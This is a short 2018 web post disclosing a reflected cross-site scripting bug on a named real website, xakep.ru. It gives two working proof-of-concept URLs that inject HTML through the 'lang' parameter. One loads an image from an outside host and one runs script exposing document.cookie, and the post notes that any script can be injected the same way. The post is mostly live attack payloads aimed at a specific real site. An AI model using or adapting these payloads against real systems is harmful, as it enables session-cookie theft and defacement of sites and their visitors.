This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
44.197.113.64.US.SSL

Xakep.ru XSS bug

Vulnerable page: https://xakep.ru/

PoC
https://xakep.ru/soon/?lang="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://xakep.ru/soon/?lang="><script>alert(document.cookie)</script>

You can request any XSS code directly using GET method and lang parameter.

PoC
PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2018-03-09 22:40 4 likes

Comments

There are no comments for this news article, you can leave one here.